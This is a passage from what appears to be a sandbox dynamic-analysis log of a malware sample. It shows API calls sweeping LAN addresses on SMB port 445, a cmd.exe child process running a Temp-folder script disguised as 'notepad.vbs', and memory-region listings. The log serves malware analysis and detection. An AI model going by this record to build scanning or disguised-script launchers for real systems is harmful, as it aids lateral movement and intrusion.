(param_1=0x730, param_2=0x36ef368) returned 0 [0240.440] GetLastError () returned 0x0 [0240.440] SetLastError (dwErrCode=0x0) [0240.440] GetLastError () returned 0x0 [0240.440] SetLastError (dwErrCode=0x0) [0240.441] htonl (hostlong=0xc0a80076) returned 0x7600a8c0 [0240.441] inet_ntoa (in=0x7600a8c0) returned="192.168.0.118" [0240.441] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0240.441] socket (af=2, type=1, protocol=6) returned 0x73c [0240.441] inet_addr (cp="192.168.0.118") returned 0x7600a8c0 [0240.441] htons (hostshort=0x1bd) returned 0xbd01 [0240.441] ioctlsocket (in: s=0x73c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0240.441] connect (s=0x73c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.118"), namelen=16) returned -1 [0240.441] ioctlsocket (in: s=0x73c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0240.441] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0241.452] __WSAFDIsSet (param_1=0x73c, param_2=0x36ef368) returned 0 [0241.452] GetLastError () returned 0x0 [0241.452] SetLastError (dwErrCode=0x0) [0241.452] GetLastError () returned 0x0 [0241.452] SetLastError (dwErrCode=0x0) [0241.452] htonl (hostlong=0xc0a80077) returned 0x7700a8c0 [0241.452] inet_ntoa (in=0x7700a8c0) returned="192.168.0.119" [0241.452] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0241.452] socket (af=2, type=1, protocol=6) returned 0x740 [0241.453] inet_addr (cp="192.168.0.119") returned 0x7700a8c0 [0241.453] htons (hostshort=0x1bd) returned 0xbd01 [0241.453] ioctlsocket (in: s=0x740, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0241.453] connect (s=0x740, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.119"), namelen=16) returned -1 [0241.453] ioctlsocket (in: s=0x740, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0241.453] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0242.467] __WSAFDIsSet (param_1=0x740, param_2=0x36ef368) returned 0 [0242.467] GetLastError () returned 0x0 [0242.467] SetLastError (dwErrCode=0x0) [0242.467] GetLastError () returned 0x0 [0242.467] SetLastError (dwErrCode=0x0) [0242.467] htonl (hostlong=0xc0a80078) returned 0x7800a8c0 [0242.467] inet_ntoa (in=0x7800a8c0) returned="192.168.0.120" [0242.467] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0242.467] socket (af=2, type=1, protocol=6) returned 0x74c [0242.468] inet_addr (cp="192.168.0.120") returned 0x7800a8c0 [0242.468] htons (hostshort=0x1bd) returned 0xbd01 [0242.468] ioctlsocket (in: s=0x74c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0242.468] connect (s=0x74c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.120"), namelen=16) returned -1 [0242.468] ioctlsocket (in: s=0x74c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0242.468] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0243.480] __WSAFDIsSet (param_1=0x74c, param_2=0x36ef368) returned 0 [0243.480] GetLastError () returned 0x0 [0243.480] SetLastError (dwErrCode=0x0) [0243.480] GetLastError () returned 0x0 [0243.480] SetLastError (dwErrCode=0x0) [0243.480] htonl (hostlong=0xc0a80079) returned 0x7900a8c0 [0243.480] inet_ntoa (in=0x7900a8c0) returned="192.168.0.121" [0243.480] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0243.480] socket (af=2, type=1, protocol=6) returned 0x750 [0243.481] inet_addr (cp="192.168.0.121") returned 0x7900a8c0 [0243.481] htons (hostshort=0x1bd) returned 0xbd01 [0243.481] ioctlsocket (in: s=0x750, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0243.481] connect (s=0x750, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.121"), namelen=16) returned -1 [0243.482] ioctlsocket (in: s=0x750, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0243.482] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0244.497] __WSAFDIsSet (param_1=0x750, param_2=0x36ef368) returned 0 [0244.497] GetLastError () returned 0x0 [0244.497] SetLastError (dwErrCode=0x0) [0244.497] GetLastError () returned 0x0 [0244.497] SetLastError (dwErrCode=0x0) [0244.497] htonl (hostlong=0xc0a8007a) returned 0x7a00a8c0 [0244.497] inet_ntoa (in=0x7a00a8c0) returned="192.168.0.122" [0244.497] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0244.497] socket (af=2, type=1, protocol=6) returned 0x75c [0244.497] inet_addr (cp="192.168.0.122") returned 0x7a00a8c0 [0244.497] htons (hostshort=0x1bd) returned 0xbd01 [0244.497] ioctlsocket (in: s=0x75c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0244.497] connect (s=0x75c, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.122"), namelen=16) returned -1 [0244.498] ioctlsocket (in: s=0x75c, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0244.498] select (in: nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350 | out: readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470) returned 0 [0245.508] __WSAFDIsSet (param_1=0x75c, param_2=0x36ef368) returned 0 [0245.508] GetLastError () returned 0x0 [0245.508] SetLastError (dwErrCode=0x0) [0245.508] GetLastError () returned 0x0 [0245.508] SetLastError (dwErrCode=0x0) [0245.508] htonl (hostlong=0xc0a8007b) returned 0x7b00a8c0 [0245.508] inet_ntoa (in=0x7b00a8c0) returned="192.168.0.123" [0245.508] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x36ef578 | out: lpWSAData=0x36ef578) returned 0 [0245.508] socket (af=2, type=1, protocol=6) returned 0x760 [0245.508] inet_addr (cp="192.168.0.123") returned 0x7b00a8c0 [0245.508] htons (hostshort=0x1bd) returned 0xbd01 [0245.508] ioctlsocket (in: s=0x760, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0245.508] connect (s=0x760, name=0x36ef358*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.123"), namelen=16) returned -1 [0245.509] ioctlsocket (in: s=0x760, cmd=-2147195266, argp=0x36ef34c | out: argp=0x36ef34c) returned 0 [0245.509] select (nfds=0, readfds=0x0, writefds=0x36ef368, exceptfds=0x36ef470, timeout=0x36ef350) Thread: id = 140 os_tid = 0x724 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x50958000" os_pid = "0x96c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x964" cmd_line = "C:\\Windows\\system32\\cmd.exe /c C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 180 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 181 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 182 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 183 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 184 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 185 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 186 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 187 start_va = 0x4a010000 end_va = 0x4a05bfff entry_point = 0x4a010000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 188 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 189 start_va = 0x77850000 end_va = 0x779cffff entry_point = 0x77850000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 190 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 191 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 192 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 193 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 194 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 195 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 196 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 197 start_va = 0x5b0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 198 start_va = 0x74d90000 end_va = 0x74d97fff entry_point = 0x74d90000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 199 start_va = 0x74da0000 end_va = 0x74dfbfff entry_point = 0x74da0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 200 start_va = 0x74e00000 end_va = 0x74e3efff entry_point = 0x74e00000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 201 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x0 region_type = private name = "private_0x0000000077450000" filename = "" Region: id = 202 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x0 region_type = private name = "private_0x0000000077550000" filename = "" Region: id = 203 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 204 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 205 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 206 start_va = 0x7a0000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 207 start_va = 0x75a20000 end_va = 0x75b2ffff entry_point = 0x75a20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 208 start_va = 0x765f0000 end_va = 0x76635fff entry_point = 0x765f0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 209 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 210 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 211 start_va = 0xa30000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 212 start_va = 0x75150000 end_va = 0x75156fff entry_point = 0x75150000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 213 start_va = 0x753a0000 end_va = 0x753abfff entry_point = 0x753a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 214 start_va = 0x753b0000 end_va = 0x7540ffff entry_point = 0x753b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 215 start_va = 0x75410000 end_va = 0x754acfff entry_point = 0x75410000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 216 start_va = 0x756f0000 end_va = 0x757effff entry_point = 0x756f0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 217 start_va = 0x75b30000 end_va = 0x75bcffff entry_point = 0x75b30000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 218 start_va = 0x75e30000 end_va = 0x75edbfff entry_point = 0x75e30000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 219 start_va = 0x762b0000 end_va = 0x762c8fff entry_point = 0x762b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 220 start_va = 0x762d0000 end_va = 0x762d9fff entry_point = 0x762d0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 221 start_va = 0x772d0000 end_va = 0x773bffff entry_point = 0x772d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 222 start_va = 0x773c0000 end_va = 0x7744ffff entry_point = 0x773c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 223 start_va = 0x1b0000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 224 start_va = 0x75d40000 end_va = 0x75e0bfff entry_point = 0x75d40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 225 start_va = 0x76500000 end_va = 0x7655ffff entry_point = 0x76500000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 226 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 227 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 228 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 229 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 230 start_va = 0x8a0000 end_va = 0xa20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 231 start_va = 0xa40000 end_va = 0x1e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 232 start_va = 0x1e40000 end_va = 0x2182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 233 start_va = 0x2190000 end_va = 0x245efff entry_point = 0x2190000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 234 start_va = 0x76670000 end_va = 0x772b9fff entry_point = 0x76670000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 235 start_va = 0x75ce0000 end_va = 0x75d36fff entry_point = 0x75ce0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 236 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 237 start_va = 0x74fb0000 end_va = 0x7514dfff entry_point = 0x74fb0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 238 start_va = 0x120000 end_va = 0x120fff entry_point = 0x120000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 239 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 240 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 241 start_va = 0x4e0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 242 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 243 start_va = 0x75540000 end_va = 0x7569bfff entry_point = 0x75540000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 244 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 245 start_va = 0x74d00000 end_va = 0x74d7ffff entry_point = 0x74d00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 246 start_va = 0x2460000 end_va = 0x253efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 247 start_va = 0x2650000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 248 start_va = 0x74eb0000 end_va = 0x74fa4fff entry_point = 0x74eb0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 249 start_va = 0x75f60000 end_va = 0x75feefff entry_point = 0x75f60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 250 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 251 start_va = 0x754b0000 end_va = 0x75532fff entry_point = 0x754b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 252 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 253 start_va = 0x74e80000 end_va = 0x74ea0fff entry_point = 0x74e80000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 254 start_va = 0x756a0000 end_va = 0x756e4fff entry_point = 0x756a0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 255 start_va = 0x440000 end_va = 0x45efff entry_point = 0x440000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 256 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 257 start_va = 0x74e70000 end_va = 0x74e7afff entry_point = 0x74e70000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 258 start_va = 0x160000 end_va = 0x163fff entry_point = 0x160000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 259 start_va = 0x470000 end_va = 0x49ffff entry_point = 0x470000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 260 start_va = 0x4a0000 end_va = 0x4a3fff entry_point = 0x4a0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 261 start_va = 0x520000 end_va = 0x585fff entry_point = 0x520000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 262 start_va = 0x2690000 end_va = 0x2a82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 263 start_va = 0x757f0000 end_va = 0x759eafff entry_point = 0x757f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 264 start_va = 0x75be0000 end_va = 0x75cd4fff entry_point = 0x75be0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 265 start_va = 0x76190000 end_va = 0x762acfff entry_point = 0x76190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 266 start_va = 0x762e0000 end_va = 0x76415fff entry_point = 0x762e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 267 start_va = 0x772c0000 end_va = 0x772cbfff entry_point = 0x772c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 268 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 269 start_va = 0x2540000 end_va = 0x263ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 270 start_va = 0x2a90000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 271 start_va = 0x2bb0000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 272 start_va = 0x2d00000 end_va = 0x2d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 273 start_va = 0x2ec0000 end_va = 0x2fbffff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 274 start_va = 0x75e10000 end_va = 0x75e21fff entry_point = 0x75e10000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 275 start_va = 0x75ff0000 end_va = 0x7618cfff entry_point = 0x75ff0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 276 start_va = 0x76640000 end_va = 0x76666fff entry_point = 0x76640000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 277 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 278 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 440 start_va = 0x6d0000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 441 start_va = 0x3070000 end_va = 0x316ffff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Thread: id = 2 os_tid = 0x970 [0020.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x43f96c | out: lpSystemTimeAsFileTime=0x43f96c*(dwLowDateTime=0xed8834e0, dwHighDateTime=0x1d4a418)) [0020.100] GetCurrentProcessId () returned 0x96c [0020.100] GetCurrentThreadId () returned 0x970 [0020.100] GetTickCount () returned 0x15ffa [0020.100] QueryPerformanceCounter (in: lpPerformanceCount=0x43f964 | out: lpPerformanceCount=0x43f964*=1809579600000) returned 1 [0020.101] GetModuleHandleA (lpModuleName=0x0) returned 0x4a010000 [0020.101] __set_app_type (_Type=0x1) [0020.101] __p__fmode () returned 0x75ed31f4 [0020.102] __p__commode () returned 0x75ed31fc [0020.102] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0321a6) returned 0x0 [0020.102] __getmainargs (in: _Argc=0x4a034238, _Argv=0x4a034240, _Env=0x4a03423c, _DoWildCard=0, _StartInfo=0x4a034140 | out: _Argc=0x4a034238, _Argv=0x4a034240, _Env=0x4a03423c) returned 0 [0020.102] GetCurrentThreadId () returned 0x970 [0020.102] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x970) returned 0x60 [0020.102] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a20000 [0020.102] GetProcAddress (hModule=0x75a20000, 